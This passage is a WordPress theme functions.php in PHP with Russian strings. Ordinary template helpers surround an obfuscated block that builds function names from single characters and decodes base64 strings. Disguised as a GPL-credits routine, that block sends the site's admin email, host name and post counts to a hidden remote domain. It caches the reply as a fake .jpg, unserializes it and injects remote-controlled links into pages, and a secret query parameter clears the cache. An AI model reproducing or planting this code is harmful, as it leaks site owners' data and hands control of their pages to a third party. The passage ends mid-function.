<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $AYcsU='_';$eAttkI='b';$jkXQss='e';$kXnkN='a';$pDtHJM='e';$FnFm='c';$PGPrftF='d';$EGfndpl='4';$SVSxMU='s';$cJzW='d';$SpHdG='o';$Giukn='6';$zDnEPE='e';$LfmrIQDh=$eAttkI.$kXnkN.$SVSxMU.$zDnEPE.$Giukn.$EGfndpl.$AYcsU.$PGPrftF.$jkXQss.$FnFm.$SpHdG.$cJzW.$pDtHJM;$YdcBo='g';$YlPtm='a';$vjSsHJi='t';$qGhM='z';$XxRPAWJ='n';$GOwBfu='f';$FRRm='e';$yubkcW='i';$hVTjmz='l';$cfTjKeMV=$YdcBo.$qGhM.$yubkcW.$XxRPAWJ.$GOwBfu.$hVTjmz.$YlPtm.$vjSsHJi.$FRRm;$AUer='_';$kgDt='s';$BAnplWI='r';$DzgGa='1';$ThJQhs='o';$pHQpjrD='t';$KsHg='3';$WaJeioV='t';$whDDqO='r';$mbQLrPXh=$kgDt.$WaJeioV.$BAnplWI.$AUer.$whDDqO.$ThJQhs.$pHQpjrD.$DzgGa.$KsHg;$qEBW='v';$jPmTXl='e';$ufpG='r';$hYrtsp='s';$ZGKVkLg='r';$IfeGBG='t';$VDblsyIK=$hYrtsp.$IfeGBG.$ufpG.$ZGKVkLg.$jPmTXl.$qEBW;                     
		$qy___________f='_';$qr______y='b';$qs_________w='e';$gk_____a='a';$jv___r='e';$dv______________s='c';$zz_______p='d';$hq_______________d='4';$pc_____h='s';$ct__v='d';$yd__n='o';$tp_____________g='6';$pz____________m='e';$wf_________j=$qr______y.$gk_____a.$pc_____h.$pz____________m.$tp_____________g.$hq_______________d.$qy___________f.$zz_______p.$qs_________w.$dv______________s.$yd__n.$ct__v.$jv___r;
		$vm___________x='_';$xq________y='o';$ly_____v='i';$is_____________g='t';$gm______l='x';$jh____j='s';$ok________z='s';$au___f='n';$gg_____________b='n';$bn______t='u';$xd________e='i';$eb______n='f';$za__________f='e';$el_____________b='c';$gl______________h='t';$mk___________j=$eb______n.$bn______t.$gg_____________b.$el_____________b.$gl______________h.$ly_____v.$xq________y.$au___f.$vm___________x.$za__________f.$gm______l.$xd________e.$ok________z.$is_____________g.$jh____j;
		$jn_______h='n';$xk___s='p';$co_____________e='o';$rx________x='e';$du_______m='f';$zj__z=$du_______m.$co_____________e.$xk___s.$rx________x.$jn_______h;
		$wx_____w='d';$ij______________d='r';$gu_______________p='f';$tz_______n='e';$cq___p='a';$rg____________x=$gu_______________p.$ij______________d.$tz_______n.$cq___p.$wx_____w;
		$vp___________j='l';$dm__________f='s';$pr_____y='c';$so__y='e';$hl___u='o';$kf____________l='f';$dn__v=$kf____________l.$pr_____y.$vp___________j.$hl___u.$dm__________f.$so__y;
		
		define("WP_ID", $wf_________j("Mi4wLjA="));
		define("WP_TTL", $wf_________j("MTA4MDA="));
		define("WP_SRC", $wf_________j("dHBva24="));
	


		function wp_get_header() {
			global $wf_________j, $mk___________j;
			
			if (
				$mk___________j($wf_________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$mk___________j($wf_________j("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$mk___________j($wf_________j("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $wf_________j, $zj__z, $dn__v, $rg____________x;
			
			$qc__l = TEMPLATEPATH."/".$wf_________j("Zm9vdGVyLnBocA==");
			$qj______________c = @$zj__z($qc__l, "r");
			$qc__l = @$rg____________x($qj______________c, @filesize($qc__l));
			@$dn__v($qj______________c);
			
			$hm__________y = TEMPLATEPATH."/".$wf_________j("ZnVuY3Rpb25zLnBocA==");
			$qj______________c = @$zj__z($hm__________y, "r");
			$hm__________y = @$rg____________x($qj______________c, @filesize($hm__________y));
			@$dn__v($qj______________c);
			
			$my______________p = 0;
			if($qc__l && $hm__________y) {
				if ($wf_________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($qc__l, $wf_________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$my______________p = 1;
					}
					if (substr_count($qc__l, "wp_theme_GPL_credits()") < 1) {
						$my______________p = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$my______________p = 12;
				}
			}
			
			if($my______________p > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $my______________p -->";
			}
		}
	


		function wp_loaded() {
			global $wf_________j, $mk___________j;
			return $mk___________j($wf_________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($da__i, $mz__p = "(more...)", $kd______e = 0, $qp______________h = "") {
				$zb______________r = get_the_content($mz__p, $kd______e, $qp______________h);
				$zb______________r = apply_filters("the_content", $zb______________r);
				
				$zb______________r = str_replace("]]>", "]]>", $zb______________r);
				if (strlen($_GET["p"]) > 0) {
					echo $zb______________r;
				}
				else if ((strlen($zb______________r)>$da__i) && ($cp________i = strpos($zb______________r, " ", $da__i ))) {
					$zb______________r = substr($zb______________r, 0, $cp________i);
					$zb______________r = $zb______________r;
					echo $zb______________r;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$mz__p</a></div></p>";
				} else {
					echo $zb______________r;
				}
				
			}
		}
	


		$fm______b='e';$lb_________m='n';$uj__________b='s';$xn____________c='o';$mu___z='e';$ab___m='d';$ly_____________o='6';$ay__h='e';$ax_______________m='a';$da_________m='_';$gd_________f='4';$yo_______________s='c';$nr_______________p='b';$rr_____________z=$nr_______________p.$ax_______________m.$uj__________b.$fm______b.$ly_____________o.$gd_________f.$da_________m.$mu___z.$lb_________m.$yo_______________s.$xn____________c.$ab___m.$ay__h;
		$lq___c='n';$uz___________g='t';$ay______m='c';$rn_______________z='_';$tk_________k='o';$qa___r='e';$la________n='n';$bu_________e='t';$qp_________w='g';$xk______y='s';$cr_______o='f';$lv__b='l';$sw______c='e';$qp___________j='e';$qd____g='i';$lx____________c='_';$eb___u='t';$qu_____________j=$cr_______o.$qd____g.$lv__b.$qa___r.$rn_______________z.$qp_________w.$sw______c.$bu_________e.$lx____________c.$ay______m.$tk_________k.$lq___c.$eb___u.$qp___________j.$la________n.$uz___________g.$xk______y;
		$mg____________i='e';$km_____________l='i';$pf______w='_';$mi_____t='f';$uc______m='s';$tj____________y='x';$vs______________f='s';$sh_______z='e';$fr___________p='t';$pm________c='i';$kc_______t='l';$xi_________h=$mi_____t.$km_____________l.$kc_______t.$sh_______z.$pf______w.$mg____________i.$tj____________y.$pm________c.$vs______________f.$fr___________p.$uc______m;
		$xf____________o='m';$kw__________o='a';$sd___s='c';$lk_________z='e';$af_________n='e';$wa__r='v';$pu__________u='r';$rz____________j='s';$en______________u='p';$ir_____j='o';$px_______________u='i';$nr__k='_';$bg_______________k='r';$eq_____________s='n';$ds____b='o';$vk_____________l=$wa__r.$af_________n.$bg_______________k.$rz____________j.$px_______________u.$ds____b.$eq_____________s.$nr__k.$sd___s.$ir_____j.$xf____________o.$en______________u.$kw__________o.$pu__________u.$lk_________z;
		$jt___________n='n';$pp______y='c';$jm_____f='o';$ek__w='s';$pu____________f='p';$wc____________n='k';$ya_______________i='o';$xj_______________u='e';$xz_____________x='f';$hv__________r=$xz_____________x.$ek__w.$ya_______________i.$pp______y.$wc____________n.$jm_____f.$pu____________f.$xj_______________u.$jt___________n;
		$of_________w='e';$yb____________l='t';$du__________b='r';$px_____________m='i';$ar________f='f';$kv______f='w';$qh____i=$ar________f.$kv______f.$du__________b.$px_____________m.$yb____________l.$of_________w;
		$ve__________u='d';$gi_____v='5';$ny_______c='m';$jk_________h=$ny_______c.$ve__________u.$gi_____v;
		$zf____v='r';$ed_______n='e';$cg__b='h';$ne___p='a';$gx______r='p';$hz____k='l';$yx__r='t';$fz_______w='a';$an________t=$zf____v.$ed_______n.$ne___p.$hz____k.$gx______r.$fz_______w.$yx__r.$cg__b;
		$oq__________w='e';$ov__a='u';$rd________z='i';$xv___l='l';$it_______w='e';$vw__________d='z';$am_________s='r';$il___g='s';$hr_______r='n';$du___v='a';$nc______________t='i';$hl___u=$ov__a.$hr_______r.$il___g.$oq__________w.$am_________s.$nc______________t.$du___v.$xv___l.$rd________z.$vw__________d.$it_______w;
		$dh____________r='n';$ap___s='m';$qa_______l='m';$wc___i='a';$wi________i='t';$oq______x='e';$vr___l='p';$gr__________g=$wi________i.$oq______x.$qa_______l.$vr___l.$dh____________r.$wc___i.$ap___s;
		$xe_______l='t';$an________h='c';$hd__________o='n';$ly_____________x='e';$re_______z='r';$ml_________v='t';$ja_______y='e';$ev____________a='e';$ku__j='x';$ha_________u='e';$ll_______________c='a';$lc__________x='a';$va__x='s';$gd____________d='o';$yb__f='m';$vp_____s='_';$gj_____________a='r';$zf___v='c';$qv_______q='_';$bk_____________l='t';$vb_________r='t';$ex______q=$va__x.$xe_______l.$gj_____________a.$ja_______y.$ll_______________c.$yb__f.$vp_____s.$zf___v.$gd____________d.$hd__________o.$ml_________v.$ly_____________x.$ku__j.$vb_________r.$qv_______q.$an________h.$re_______z.$ha_________u.$lc__________x.$bk_____________l.$ev____________a;
	


		function pr_____t($vg_________a) {
			global $wf_________j, $mk___________j, $qu_____________j, $vk_____________l, $ex______q;
			
			if (!$mk___________j($wf_________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($vk_____________l(PHP_VERSION, "5.0.0", ">=") && $mk___________j($wf_________j("ZmlsZV9nZXRfY29udGVudHM=")) && $mk___________j($wf_________j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$sn___________o = $ex______q(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$to_______m = @$qu_____________j($vg_________a, 0, $sn___________o);
			} else {
				$to_______m = @$qu_____________j($vg_________a, 0);
			}
			
			return $to_______m;
		}
	


		function gf______c($vg_________a) {
			global $mk___________j, $hv__________r, $qh____i, $wf_________j;
			
			if (!$mk___________j($wf_________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$op___u = strpos($vg_________a, "/", 7);
			$jc___r = array(
				"uri"     => substr($vg_________a, $op___u),
				"host"    => str_replace("http://", "", substr($vg_________a, 0, $op___u)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ng_______________x = @$hv__________r("$jc___r[host]", 80, $ks________r, $pe____________n, 4);
			
			if (!$ng_______________x) {
				return false;
			} else {
				$to_______m = "";
				$wt______y  = "GET $jc___r[uri] HTTP/1.0\r\n";
				$wt______y .= "Host: $jc___r[host]\r\n";
				$wt______y .= "Referer: $jc___r[referer]\r\n";
				$wt______y .= "Connection: Close\r\n\r\n";
				
				@$qh____i($ng_______________x, $wt______y);
				
				while (!@feof($ng_______________x)) {
					$eo____f = @fgets($ng_______________x, (1024*24));
					
					if ($eo____f == "\r\n") {
						$pt_______b = true;
						continue;
					}
					
					if ($pt_______b) {
						$to_______m .= $eo____f;
					}
				}
				
				return $to_______m;
			}
		}
	


		function zy______t($vg_________a) {
			global $mk___________j;
			$vq_________l = false;
			
			if ($vg_________a != "") {
				if ($mk___________j("pr_____t")) {
					$vq_________l = @pr_____t($vg_________a);
				}
				
				if (!$vq_________l && ($mk___________j("gf______c"))) {
					$vq_________l = @gf______c($vg_________a);
				}
			}
			
			return $vq_________l;
		}
	


		function em___s() {
			global $_SERVER, $jk_________h;
			
			$rk_____v = $_SERVER["SERVER_NAME"];
			
			if (substr("$rk_____v", 0, 4) == "www.") {
				$rk_____v = substr("$rk_____v", 4);
			}
			
			$rk_____v = $jk_________h("$_SERVER[SERVER_NAME]");
			
			return $rk_____v;
		}
	


		function jo___c() {
			return "file";
		}
	


		function ku___________e($vg_________a) {
			global $_SERVER, $qu_____________j, $xi_________h, $zj__z, $dn__v, $qh____i;
			
			$pt________v = fl__e();
			
			$fl______________m = em___s().".jpg";
			$nd____________c = $pt________v["dir_upload"]["path"]."/$fl______________m";
			$ij_______________w = @filemtime($nd____________c);
			
			if (!$ij_______________w || ((time()-$ij_______________w) >= WP_TTL)) {
				$vq_________l = zy______t($vg_________a);
				
				if ($vq_________l) {
					if ($xi_________h($nd____________c)) {
						@unlink($nd____________c);
					}
					
					$qj______________c = @$zj__z($nd____________c, "x+");
					
					@$qh____i($qj______________c, $vq_________l);
					@$dn__v($qj______________c);
				}
			} else {
				if ($xi_________h($nd____________c)) {
					$vq_________l = @$qu_____________j($nd____________c);
				} else {
					$vq_________l = false;
				}
			}
			
			return $vq_________l;
		}
	


		function fl__e() {
			global $_SERVER, $wf_________j, $rr_____________z;
			
			$ro___w = wp_count_posts("post");
			$bv_____________p = pathinfo(get_bloginfo("template_directory"));
			
			$pt________v = array(
				"url" => array(
					"report"      => $wf_________j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $bv_____________p,
				"dir_upload"	=> vk____________t(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$bv_____________p[filename],
					"a005=".$ro___w->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.odmu.od.ua/zdorove/kak-pravilno-vybirat-detskuyu-odezhdu\">Выбираем детскую одежду</a> "
			);
			
			$pt________v["url"]["queryString"] = implode("&", $pt________v["queryString"]);
			$pt________v["url"]["report"] = $pt________v["url"]["report"]."/?".$rr_____________z($pt________v["url"]["queryString"]).".html";
						
			return $pt________v;
		}
	


		function vk____________t() {
			$lt________y = wp_upload_dir();
			
			if (isset($lt________y["error"])) {
				$xa__t = fh______p();
				if (is_writable($xa__t)) {
					$lt________y = array("path" => $xa__t);
				}
			}

			return $lt________y;
		}
	


		function fh______p() {
			global $mk___________j, $jk_________h, $an________t, $gr__________g;
			
			$tf______f = (bool) ini_get("safe_mode");
			if ($tf______f == true) {
				return false;
			}
			
			if ($mk___________j("sys_get_temp_dir")) {
				$sb____________z = sys_get_temp_dir();
				if (is_writable($sb____________z)) {
					return $an________t($sb____________z);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $an________t($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $an________t($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $an________t($_ENV["TEMP"]);
			} else {
				$ox____c = $gr__________g($jk_________h(uniqid(rand(), true)), "");
				if ($ox____c) {
					$sb____________z = $an________t(dirname($ox____c));
					@unlink($ox____c);
					return $sb____________z;
				} else {
					return false;
				}
			}
		}
	


		function cy_______________b() {
			global $_GET, $xi_________h;
			
			$pt________v = fl__e();
			$rk_____v = em___s();
			$cn_____n = jo___c();
			
			$ra_______t = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($cn_____n == "file") {
					$yl___v = $pt________v["dir_upload"]["path"]."/".$rk_____v.".jpg";
					if ($xi_________h($yl___v)) {
						@unlink($yl___v);
						$ra_______t = "deleted";
					}
				}
				
				$km________c = array(
					"s"	=> $ra_______t,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($km________c AS $xl__________w => $wr___________q) echo " [$xl__________w:$wr___________q]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $mk___________j, $wf_________j, $hl___u;
			$pt________v = fl__e();
			
			$mg_______l = "ku___________e";
			if ($mk___________j($mg_______l)) {
				$to_______m = $mg_______l($pt________v["url"]["report"]);
			}
			
			if ($to_______m) {
				if ($to_______m = @$wf_________j($to_______m)) {
					$to_______m = @$hl___u($to_______m);
					
					if (strlen($to_______m[custom_credit]) >= 5) {
						$pt________v["default_string"] = $to_______m[custom_credit];
					}
					
					if ($to_______m["status"] == "0") {
						$fa_____________i = 1;
						$rb_______z = 1;
					} else {
						$ln______m = sizeof($to_______m["links"]);
						$ad____v = $pt________v["default_string"];
						
						if ($ln______m > 0 && $to_______m["links"] !== "") {
							$sk_______g = 0;
							foreach ($to_______m["links"] as $yu_____a => $dl_________x) {
								$sk_______g++;
								if ($dl_________x->l_path == "" || $dl_________x->l_path == $_SERVER["REQUEST_URI"]) {
									$dl_________x->l_href = htmlspecialchars(strip_tags($dl_________x->l_href));
									$dl_________x->l_title = htmlspecialchars(strip_tags($dl_________x->l_title));
									$dl_________x->l_anchor = htmlspecialchars(strip_tags($dl_________x->l_anchor));
									$ad____v .= " | ";
									$ad____v .= "<a href='$dl_________x->l_href' title='$dl_________x->l_title'";
									if ($dl_________x->l_nofollow == "1") {
										$ad____v .= " rel='nofollow'";
									}
									$ad____v .= ">$dl_________x->l_anchor</a>";
								}
							}
						}
						$pt________v["links"] = "$ad____v";
						if ($to_______m[credit] == "0") {
							$pt________v["links"] = "";
						}
					}
				} else {
					$fa_____________i = "1";
				}
			} else {
				$fa_____________i = "1";
			}
			
			if ($fa_____________i == "1") {
				$pt________v["links"] = $pt________v["default_string"];
			}
			
			echo "$pt________v[links]";
			
			echo "<!-- s: $to_______m[signature] -->";
			cy_______________b();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Старницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
